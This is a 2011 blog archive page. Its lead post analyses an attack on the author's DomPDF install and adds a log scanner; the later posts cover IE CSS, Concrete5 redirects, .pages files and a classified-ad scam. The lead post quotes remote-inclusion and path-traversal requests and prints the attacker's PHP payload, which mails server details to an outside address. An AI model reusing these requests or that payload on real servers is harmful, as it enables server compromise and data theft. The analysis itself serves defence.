Archive for the ‘Language’ Category

Attack on DomPDF

Sunday, October 2nd, 2011

After installing Varnish I can see pages which are frequently accessed.

//dompdf.php?input_file=http://www.fridela.com/slide/vero.txt?

And

/max/2009/06/bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file=../../../../../../../../../../../../../../../../proc/self/environ%00

were lines which I found quite strange. Was someone abusing my server to convert their stuff to PDF?

I tried to go to fridela.com – it seems like a normal website, dedicated to selling food to housewives.

vero.txt is reported as dangerous by Microsoft Security Essentials.

I DO know that it's a text file; probably its danger lies in its use with the correct application. Here are the contents of vero.txt:

<?
$win = strtolower(substr(PHP_OS,0,3)) == "win";
echo "PLaTo<br>";
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "4ON6";
}
else {$safemode = false; $hsafemode = "3OFF6";}
$xos = wordwrap(php_uname(),90,"<br>",1);
$xpwd = @getcwd();
$OS = "<<".$hsafemode.">> ".$xos."";
echo "<center><A class=ria href=\"";echo'" DESIGNTIMESP=16110>http://".$OS."\">";echo "PLaTo</A></center><br>";
echo "<br>OSTYPE:$OS<br>";
echo "<br>Pwd:$xpwd<br>";
eval(base64_decode("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"));
die("<center> ByroeNet </center>");
?>

The base64 part decodes to

if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") { $safemode = "ON"; } else { $safemode = "OFF"; }
$visitor = $_SERVER["REMOTE_ADDR"];
$float = "From : vurl info <full@info.com>";
$aran = exec('uname -a;');
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "Bug http://".$web.$inj."nnSpread Via : ".$visitor."nnKernel Version : ".$aran."nnSafe Mode : ".$safemode;
mail("unixon2010@gmail.com","Setoran Bos ".$safemode,$body,$float);

For the exploit to work, DomPDF actually has to execute it, i.e. it has to run the included file as PHP code. After the exploit has been installed, a mail is sent to unixon2010@gmail.com.

Additional code seems to be hosted at http://www.fridela.com/slide/air.txt – it's apparently a control interface to the cracked server (maybe also injected via DomPDF).

Be careful around these. Turn off inclusion of remote URLs in your PHP.ini.
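
To check your own logs for requests like the two quoted above, here is a small scanner. It is an added example, not part of the original post: it assumes Apache-style access-log lines, and the sample lines (IPs, timestamps, sizes) and the reason labels are constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# Constructed access-log lines: client IPs, timestamps and sizes are made up.
# The first two request URIs are the ones quoted in the post; the third is a
# made-up benign request to the same script.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Oct/2011:09:14:03 +0200] "GET //dompdf.php'
    '?input_file=http://www.fridela.com/slide/vero.txt? HTTP/1.1" 200 512',
    '192.0.2.11 - - [02/Oct/2011:09:15:47 +0200] "GET /max/2009/06/'
    'bambooinvoice-und-pdf-briefpapier/dompdf.php?input_file='
    '../../../../../../../../../../../../../../../../proc/self/environ%00'
    ' HTTP/1.1" 200 0',
    '192.0.2.12 - - [02/Oct/2011:09:16:20 +0200] "GET /invoices/dompdf.php'
    '?input_file=invoice-2011-10.html HTTP/1.1" 200 48211',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
SCHEME_RE = re.compile(r"[a-z][a-z0-9+.\-]*://")


def classify_request(uri):
    """Return sorted reasons why a dompdf.php request looks like an inclusion attempt."""
    # Split by hand: a leading "//" would make urlsplit() treat the script
    # name as a host name.
    path, _, query = uri.partition("?")
    if not path.lower().endswith("/dompdf.php"):
        return []
    reasons = set()
    # parse_qs percent-decodes values, so "%00" arrives here as "\x00".
    for value in parse_qs(query).get("input_file", []):
        normalized = value.replace("\\", "/").lower()
        if SCHEME_RE.match(normalized):
            reasons.add("remote_url")          # http://, ftp://, php:// ...
        if ".." in normalized.split("/"):
            reasons.add("path_traversal")
        if "\x00" in value:
            reasons.add("null_byte")           # %00 cuts the path short in old PHP
        if "proc/self/environ" in normalized:
            reasons.add("proc_self_environ")
    return sorted(reasons)


def scan_log(lines):
    """Return (client_ip, uri, reasons) for every flagged request line."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        reasons = classify_request(match.group(1))
        if reasons:
            hits.append((line.split(" ", 1)[0], match.group(1), reasons))
    return hits


if __name__ == "__main__":
    for ip, uri, reasons in scan_log(SAMPLE_LOG):
        print(ip, ",".join(reasons), uri)
```

Any hit is worth following up by checking whether the response was a 200 and whether new files appeared in the web root around that time.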

Amazon Self-Optimizing Links

Monday, September 19th, 2011

These links are supposed to adapt themselves to the content of the page:


Interactive Brokers and Opera + Privoxy

Saturday, September 17th, 2011

At some point in creating a new account, Interactive Brokers' "Next" button won't work (on the page where you declare your investment targets and net worth).

The solution is to use Firefox without Privoxy to continue with the application form.

I am not sure whether it is Privoxy or Opera blocking the application (although I suspect Privoxy blocking some JavaScripts.)

Internet Explorer, position fixed and strict mode

Wednesday, September 14th, 2011

You want to use fixed positioning with CSS

If you want to make use of the simple CSS position:fixed; to display an element static to the viewport, you will run into problems with Internet Explorer.

position:fixed is only supported since Internet Explorer 7

I tested this solution with IE 7.0.5730.13 on Windows XP. IE 6 does not support fixed positioning.

You need to enforce strict mode

Internet Explorer will default to "quirky rendering mode", if you don't add special tags to your HTML document:

<!DOCTYPE html>
<HTML>
<HEAD>
<meta http-equiv="content-type" content="text/html; charset=iso-8859-1" />
<title>Progress Test</title>
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<script language = "JavaScript" src="../head.min.js"></script>
[...]

Both are essential! If you try IE 9 on the page without having added the meta tag X-UA-Compatible, it will render the page in quirky mode. And in quirky mode, it will ignore your position:fixed, and render your element where you have put it in the flow of the document.

Please note: I have read that this meta tag actually is not valid for this DOCTYPE.

It still does not work? I am testing with local documents!

Internet Explorer also takes into account where the element is being served from. This solution will work, if you upload your test documents to a server and access them over the Internet. It will not work (see note below) for local files, even if you use a local webserver to serve up the files (i.e. XAMPP). Internet Explorer will render your document in quirky mode, in this case.

Note: actually it does work offline (opening a document from the hard drive) in Internet Explorer 9 after fiddling somewhat with the document. I removed an IE compatibility script (not shown above), which I had included from Google previously. Check if you have one of those, and remove it!

Redirection with Concrete 5

Wednesday, September 14th, 2011

URL Shortening is all the rage now. Sometimes you want to give people ridiculously long URLs, which might also be subject to change.

So you want to do it with C5, don't you?

Great, you think – there's the "add external link" menu option in Concrete's sitemap. Unfortunately it does not work the way you expect it to – it just adds the link to the Navigation, but no page alias to point to the external page (i.e. http://www.synapse-redaktion.de/FaceBook won't work after adding a "FaceBook" external link).

What to do to solve this dilemma?

My suggestion is to use both: add a (hidden) page "FaceBook" which does header JavaScript forwarding to the other page, so you can give out the links to the people, and a "real external link" so you don't have to rely on JavaScript for most of your visitors.

The SiteMap will look like this:

[Screenshot: sitemap]

Adding custom attributes: (Header Extra Content, Exclude from Page List, Exclude from Nav)

[Screenshot: header extra content]

The page's setup:

[Screenshot: setup]

The script is easy:

<script type="text/javascript">
<!--
window.location = "http://www.surfnext.com"
//-->
</script>

with surfnext.com being the URL you are forwarding to.

If you have the time, you might want to add a static link or icon to the page (/*comment*/ the window.location = … part to be able to edit the page!) in case some person has their JavaScript turned off.

Just Friendship

Sunday, September 4th, 2011

Why does one want only friendship, not a relationship, with various women (as a man) or men (as a woman)?

Because the brain is not being stimulated in the right way.

That is, either it is not stimulated enough -

  • the other person is not attractive enough
  • the other person is not intelligent enough
  • the other person cannot communicate well enough
  • the other person is of the wrong sex (for homosexuals)

or the wrong centres are being stimulated

  • fear / flight reflex in people with a fear of commitment
  • friendly interest instead of romantic interest

So it all comes down to stimulating the right centres.

Stimulating the centres

These centres of course also have filters in front of them, which have to be overcome across several stages of activation. With a stranger, an intimate French kiss is thus more likely to activate the flight reflex than erotic feelings.

To awaken romantic interest in oneself in another person, one has to carry out a sequence of coordinated steps in a precise chronological order.

Of course, there are also initial filters to overcome on which one has little influence. For example, with people who have attachment disorders it is sometimes not possible at all to overcome these filters. The signal is "rerouted" in the brain, because attachment is equated with coercion / loss of one's own ego. A flight reflex follows, which can also express itself as aggression.

Once these initial filters are overcome, one can achieve better and better results by means of a sequence optimized through trial and error.

Rejection

That is why it also makes sense to treat rejection as a "failed experiment" from which one can learn:

  • some factors cannot be influenced, or only with difficulty (one's own age, the partner's fear of commitment)
  • some other factors can be varied (one's own clothing, communication sequence)

In the end it is worth repeating experiments with varied parameters in order to arrive at a successful result.

Of course, the choice of the prospective partner is also such a parameter. Partners who are known for infidelity in the past will, for example, most probably continue this pattern in one's own relationship. It is foolish to imagine that one is something special. One presumably shows the partner similar communication and attachment patterns to those of one's predecessors, and he or she will react to them similarly.

Patterns and signs

It is worth identifying one's own patterns of communication and partner choice. It is no coincidence that similar partnerships and similar relationship dynamics keep recurring.

The partner has to show certain patterns from the outset for us to be interested in him or her at all. But if these patterns are signs of certain harmful behaviours – e.g. rejection of / fear of partnership – we will keep running into such problem cases, and keep struggling with them in vain.

Certain behaviours, traits etc. are signs of certain character traits of the partner.

For example, bragging about one's own projects and achievements, as well as belittling others or their achievements, points to very low self-esteem. Such a partner can be very exhausting.

That is why friendship is a better solution with some people, one from which everyone benefits more. Until they change … and the way is clear for more.

.pages and Free Opener

Thursday, September 1st, 2011

What are .pages files?

They are files created with Pages, a part of the iWork productivity suite for Mac OS X.

How can I open them?

There is no known software which can open .pages natively on Windows or Linux.

But, there's a kind of a workaround which lets you access the content of the .pages files.

The workaround

The file is actually a .zip archive! If you have 7-zip, right-click the file to extract it. If not, you may rename the file to filename.zip and extract it with your favorite ZIP application. (Windows can do it from Windows XP upwards).

The folder which you obtain from the .pages file contains different files and folders.

  • index.xml – if you are truly desperate, the text is in here and can be extracted with a lot of patience, I guess. Also theoretically someone could write a parser for this file sometime.
  • QuickLook – this folder contains preview versions of your .pages file, if it is present – sometimes it is not (if the creator of the file did not include a preview!)

What about QuickLook & the preview files?

There are two types (that I know of):

  • PDF files – you're lucky, it contains your .pages in a format suitable for reading and further processing
  • JPG images – this is a low-resolution screenshot of the .pages file, you can still read it, but … well no copy'n'paste here.

What about Free Opener from freeopener.com?

The guys over at fileinfo.com claim that Free Opener can open .pages. Well, it's just doing the preview files thing from above. Meaning – if you only have a low-res JPEG preview image, that's all you get from Free Opener. No text, I'm sorry to say.

I like the installer – I think more installers should be built like theirs, BUT – it seems to install along with it many programs which you actually did not want in the first place, if you are not careful. Also there are rumours about it installing Adware (see WOT).

I would at this point advise against installing Free Opener to open .pages files. Use the manual method.

Are there other solutions to open .pages files?

  • Google Docs is supposed to be able to open them
  • Ask your friend / colleague / … to send you a PDF file, or to export to Word-readable formats (formatting may be lost with the latter option)
  • Buy a Mac.

Can InDesign access .pages files?

Not on Windows to my knowledge. Tested with InDesign CS5 + Windows 7 64bit without any extensions, by trying to place a .pages file. "No filter could be found".

Power to the people

Monday, August 15th, 2011

We are having the Information revolution at the moment. Digital information is easily copied and thus the cost of it approaches zero.

The next major step will be the easy availability of compact home-fabrication systems, which are able to produce things for the daily use.

3-D printers, sintering and such are technologies going in this direction. Maybe, maybe one day the Star Trek idea of replicators will be here, for you to enjoy.

This will allow people to be even more independent, and powerful.

Intellectual property is the only property which really can exist – as the human mind is running completely on thoughts (input <-> processing <-> output). For it to be able to be copied millionfold allows the cost of the individual unit to be low. Very low. And it should be.

The miracle of human creation

Sunday, August 14th, 2011

In this fascinating approach to male sperm, they are shown as highly complex machines. The first part of the movie highlights some major points about sperm, i.e. the Fructose needed for them to run being ejaculated by the male organism together with the sperm.

Then suddenly the movie goes on to say, that God had to create sperm. The reason given is, the sperm don't provide direct feedback to the testicles whether "everything worked out". And how are the testicles to know what exactly to develop? Thus, someone must have engineered sperm to precisely fit with its role in a female body.

This kind of reasoning seems to have the underlying assumption that everything is already in place as a complex whole, today.

Take Ubuntu for instance. It fits precisely with your machine, although it had no way of knowing … stop! I hear you shouting. There's the human engineers, who are designing and testing Ubuntu against a wide variety of hardware.

Yes, that's true. But, just as the human body integrates many different components derived from many different other projects – for instance about 30 % of our proteins are absolutely identical with chimpanzee's proteins – Ubuntu is also based on a lot of other projects, i.e. the Linux kernel, the GNU utilities, the apt package management system from Debian, and many, many more. And these have been developed for other systems pre-dating your system. You know, those big bulky boxes with floppy drives. And now the software has evolved (has been evolved by human engineers, granted), to support the older hardware – or at least parts of it – and also more features of your new hardware.

In the same way the human body is based – this is the evolutionist approach, of course – on previous developments and environments. Where many small, "logical" steps have been taken in the course of evolutionary change. Which gradually allowed the amazing sperm of today to happen! The male body develops a new approach, which the female body over time responds to by developing an amplified answer to, which in turn again triggers the male body to develop another layer of complexity.

Do we really need a God?

Do we really need a God? What is "God" actually to believers?

God is a system of beliefs and explanations. Take the rain, for instance. For primitive societies, it is made by God, or some mythological explanation is given about heavenly creatures – mimicking human society and behaviour, and thus experience. Think of Eris, the one with the golden apple. Think of "structured heavenly societies", like angels, fallen angels, demons, St. Pete at the Pearly Gates (fulfilling a specific function), etc.

For a scientifically-minded society, the explanation may be given by some entity, water, being evaporated by some other entity, the sun's light rays, and condensing into drops in colder areas, which then start falling down on the city. (Actually it is quite majestic and magical to just think about this "simple process". Maybe listening to the appropriate music?)

But actually this is just another system of beliefs and explanations, just more elaborate, and with fewer (apparent) contradictions in itself. How many of you are going to see a human cell under the microscope? How many are going to really analyze the molecular structure of sugar? There simply is no possibility of checking every known "fact" in existence. Trust is necessary, trust in the explanations, models, and insights of others.

Just as in indigenous societies, the medicine men explain the world to others, and communicate with the "spirits", in western societies scientists communicate with the "spirits" of nature using their instruments.

As such both religions – or more specifically most religions' ideas of God – and science are a set of thought structures inside people's minds. Transmitted from one generation to the next.

In my opinion "God" and "Nature" are just two different names for the same processes. The more science "demystifies" nature, the more shifts from being declared as "created by God" to "being a natural process". The sperm thing is just another example of this. If we fully understand how sperm came to be the way it is, there's still some precise physical conditions and structures which nature as a whole is based on, which we can't explain as of yet, which have to be attributed to "God". The structures and explanations are transferred from one belief system to another, which has more explicit understanding, which manages to build a better mental model. If one has the desire to understand the world.

Other vantage points

A squirrel may see the building of nuclear reactors from an entirely different perspective. It does not know that they exist – as such they would just be (noisy?) objects which do not contain nuts. And are not interesting as a consequence. The Tom-Harry-or Dick squirrel from your neighbourhood has no use for electricity. It does not know about it, it does not understand it (do we?), nor does it want to know. It simply wants to go about collecting nuts.

The squirrel has a different (less elaborate) belief system. But it does not have to have more. You probably have some beliefs about microprocessors which are not entirely accurate. Even if you design microprocessors, you are working in a model (!), which "mostly" works OK.

Everyone is a creator

OK, this article is already quite confusing. One last point to add: everyone is a magical creator of the world around us, by transforming it. Just as I write this article, there are people programming games for children out there. This is true magic from a child's point of view. This is being God.

Warning: fraud in replies to classified ads

Monday, August 8th, 2011

Warning about Internet fraud!!!

A Mr. Philip Stöffler (philip_stoffler33@yahoo.de) responded to my ad for two Lexmark X543DN printers (which are still available! Anyone interested, please leave a comment on the blog!).

At first with the question of what my final price would be. Slightly irritated, since I had stated fixed prices everywhere, I wrote back:

Dear Mr. Stoffler,

thank you very much for your enquiry.
My offer is a fixed price: 170 € for one printer, 300 € for both.
Collection in person – shipping possible against reimbursement of shipping costs.

Best regards,
Maximilian Batz

Today an e-mail came back from Philip Stöffler that struck me as very strange.

Hello,

I am very interested in the goods and am okay with the price and am ready, you pay the payment will be by valid Euro bank cheque, when you receive the cheque and you have the control cashed by your bank and when the money on your bank account my sender come and collect the goods in Germany is. I need the following details to send the cheque to you

Name
Address
City
Postcode
Country
Telephone number's such as mobile, home number and office number:
Last offer …

Many thanks and best regards

It is about some cheques or other … I immediately smell fraud, and at first want to write back that he should get in touch by phone if interested, and that the money should be paid in cash into my account (also to avoid fraud by means of counterfeit notes. This mail has just made me very paranoid :-)

But then I notice: this mail is simply a mass template. I.e. he probably sends this to everyone who replies to the first mail.

  • The salutation is "Hello" – without a name, and that after my very polite "Dear Mr. Stöffler", and my name in my mail
  • "The goods" is used, instead of e.g. feedback on whether he wants one or both printers. Suspicious!
  • The whole e-mail is written in gibberish German – which leads me to conclude that an online translation tool was used.
  • The sender rambles about "collecting goods in Germany", yet has a German name. Very suspicious.

I will definitely avoid communicating with this person / gang!